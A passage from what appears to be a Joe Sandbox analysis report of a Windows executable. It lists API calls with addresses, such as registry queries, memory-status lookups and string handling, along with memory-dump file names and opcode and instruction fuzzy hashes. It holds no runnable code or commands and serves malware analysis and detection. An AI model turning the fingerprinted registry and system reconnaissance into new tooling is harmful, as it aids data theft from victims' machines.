                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 46397357f3ed8938189f1a88ca5ec066105567792eb396dd2d060fb126e576e5
                              • Instruction ID: 0227f8edfab55bd8bac1d4df8ce1ce7544827540abfd4eebed7c8f50b97e74e7
                              • Opcode Fuzzy Hash: 46397357f3ed8938189f1a88ca5ec066105567792eb396dd2d060fb126e576e5
                              • Instruction Fuzzy Hash: 8B115B71600609EFEB12DFA9DC88FBB736CEB14340F11025EF901A6280EB749D04CBA0
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 003B5B14
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                              • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 003B5B7C
                              • memmove.MSVCRT(00000000,?,?), ref: 003B5B89
                              • memmove.MSVCRT(00000000,?,?), ref: 003B5B98
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long
                              • API String ID: 2052693487-3788999226
                              • Opcode ID: 44a46d45c6412e6cedd0d318a0604678d0dbf2882390b301ee037a67deffaf7a
                              • Instruction ID: 67e586fdf35cd26a7c587f7ac8fc237173023bf4c5424e11984b0c6894d14b8f
                              • Opcode Fuzzy Hash: 44a46d45c6412e6cedd0d318a0604678d0dbf2882390b301ee037a67deffaf7a
                              • Instruction Fuzzy Hash: 75417171B005199FCF09DF6CC891BAEBBB5EB88314F158229E909EB744D630DD008B90
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 003A7D58
                                • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1D5
                                • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1FB
                              • std::_Xinvalid_argument.LIBCPMT ref: 003A7D76
                              • std::_Xinvalid_argument.LIBCPMT ref: 003A7D91
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$std::exception::exception
                              • String ID: invalid string position$string too long
                              • API String ID: 3310641104-4289949731
                              • Opcode ID: 9775a9cbe1c00d0c0a944361614f75a9fc1f7c72f332e00711425e7ad53529a4
                              • Instruction ID: a209a38818e28927b9690be950c20e35ecbd40dfba1149db10718ed269952e1d
                              • Opcode Fuzzy Hash: 9775a9cbe1c00d0c0a944361614f75a9fc1f7c72f332e00711425e7ad53529a4
                              • Instruction Fuzzy Hash: BA21E6323146005BD722DE2CDCC1A7AF7E5EFA2710B204A2EE451CB641D770DC008761
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B33EF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B33F6
                              • GlobalMemoryStatusEx.KERNEL32 ref: 003B3411
                              • wsprintfA.USER32 ref: 003B3437
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB
                              • API String ID: 2922868504-2651807785
                              • Opcode ID: 85bd98ef3f2507ada800de031f96f16872b98bf028df4b2b5b48257f01bb373e
                              • Instruction ID: a1dde2ee00bb38d689896e56f4e8e795de4db50d718193a451fffbf9ec68fdaa
                              • Opcode Fuzzy Hash: 85bd98ef3f2507ada800de031f96f16872b98bf028df4b2b5b48257f01bb373e
                              • Instruction Fuzzy Hash: 2701B5B1E44614AFDB05DF98DC49FAEB7B8FB44714F000529FA06E7780DB74590086A5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit$__getptdfree
                              • String ID: Xu<$Xu<
                              • API String ID: 2640026729-2192574222
                              • Opcode ID: cdb0b2a3ff4b8a5edea001e603b1ef672da13c4df7968e8df92baf72b1601337
                              • Instruction ID: 1d5522d17a0287e17623a463954fdf68596e12453a49f653e6032b2ef9fa9e9a
                              • Opcode Fuzzy Hash: cdb0b2a3ff4b8a5edea001e603b1ef672da13c4df7968e8df92baf72b1601337
                              • Instruction Fuzzy Hash: 8C019632D05715A7D713AB699406BDDB3A4AF4171CF16041AEB04AFD90CB347D41CBD5
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,00F2E3D8,00000000,00020119,?), ref: 003AD7F5
                              • RegQueryValueExA.ADVAPI32(?,00F2F580,00000000,00000000,00000000,000000FF), ref: 003AD819
                              • RegCloseKey.ADVAPI32(?), ref: 003AD823
                              • lstrcat.KERNEL32(?,00000000), ref: 003AD848
                              • lstrcat.KERNEL32(?,00F2F478), ref: 003AD85C
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: f5a74417368c6130bcb5088123d4032e91e655c62b791c69522bddf576b06dac
                              • Instruction ID: 93812d1fe6561a3342f5484b36c7f73425ab0324c0c4cc07d4f47cebd2e93e8f
                              • Opcode Fuzzy Hash: f5a74417368c6130bcb5088123d4032e91e655c62b791c69522bddf576b06dac
                              • Instruction Fuzzy Hash: 26413075A1050DAFCB55EF64EC86FEE77B8EB54304F004064B50A9B251EE34AA898F91
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 003A7F31
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A7F60
                              • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A7FA5
                              • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A7FD3
                              • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A8007
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 18c897202ac84731af07e6a1940b2812ff75da816248aaf7b45ccbaf17dd3014
                              • Instruction ID: df767bf35ae0821506c0d1cec216e7f8486e63608d1599d1a491a8b68f585c89
                              • Opcode Fuzzy Hash: 18c897202ac84731af07e6a1940b2812ff75da816248aaf7b45ccbaf17dd3014
                              • Instruction Fuzzy Hash: 9C41803060411AEFCB22DF68D8C4EAEB7B8FF55300F124599E805DB351EB74AA65CB91
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 003A80BB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A80EA
                              • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A8102
                              • lstrlen.KERNEL32(00000000), ref: 003A8140
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A816F
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 191433ec5b19498a57a93009ec48cf027e23011eb2fb4905c4d8428acd3c5794
                              • Instruction ID: 74276d05ab93b536494d374efa8f3ec8cf1642bd1a8d080f1b7855371b280232
                              • Opcode Fuzzy Hash: 191433ec5b19498a57a93009ec48cf027e23011eb2fb4905c4d8428acd3c5794
                              • Instruction Fuzzy Hash: 6E419E71A00206AFCB22DF78D948BAABBF4EF45700F11845CA845D7204EF34DD46CB90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B3166
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B316D
                              • RegOpenKeyExA.ADVAPI32(80000002,00F1B798,00000000,00020119,?), ref: 003B318C
                              • RegQueryValueExA.ADVAPI32(?,00F2E238,00000000,00000000,00000000,000000FF), ref: 003B31A7
                              • RegCloseKey.ADVAPI32(?), ref: 003B31B1
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: ea0278763f6ec2707a6b45ec8f25c2a4343dcd538d64d3c4d6f0f337fe0fa9df
                              • Instruction ID: 528c10d76618b775ecabde3c84b083704843bc1e847fa26107dc661d3d92c56b
                              • Opcode Fuzzy Hash: ea0278763f6ec2707a6b45ec8f25c2a4343dcd538d64d3c4d6f0f337fe0fa9df
                              • Instruction Fuzzy Hash: 05115176A40615AFD710DF98DC49FBBBBBCF748B11F00426AFA09E3680DB7559048BA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 4de640f0727839386bdb1d22563731d073ce99324657db81aa83c4006858db92
                              • Instruction ID: e6b606df5c446ab82a36ded71b159c1008d326fcceae2263c9edab0a764a4497
                              • Opcode Fuzzy Hash: 4de640f0727839386bdb1d22563731d073ce99324657db81aa83c4006858db92
                              • Instruction Fuzzy Hash: 6B41097150475CAEDB338B28CD85FFB7BFC9B45308F1448E9EB868A582D2719A459F20
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00398996
                                • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1D5
                                • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1FB
                              • std::_Xinvalid_argument.LIBCPMT ref: 003989CD
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: invalid string position$string too long
                              • API String ID: 2002836212-4289949731
                              • Opcode ID: 162d0fac3ce06b546fe187b8ece78eba45843aac84ee8613b4dafab4fcd713ac
                              • Instruction ID: 652ae8bb307b514e51775ff6737a05bd93ba009e20aa596758c463df1496447f
                              • Opcode Fuzzy Hash: 162d0fac3ce06b546fe187b8ece78eba45843aac84ee8613b4dafab4fcd713ac
                              • Instruction Fuzzy Hash: A421A6723006505BCF229B5CE840A6AF799DBE2761B15093FF152CB641DB71DC41C3A5
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00398883
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
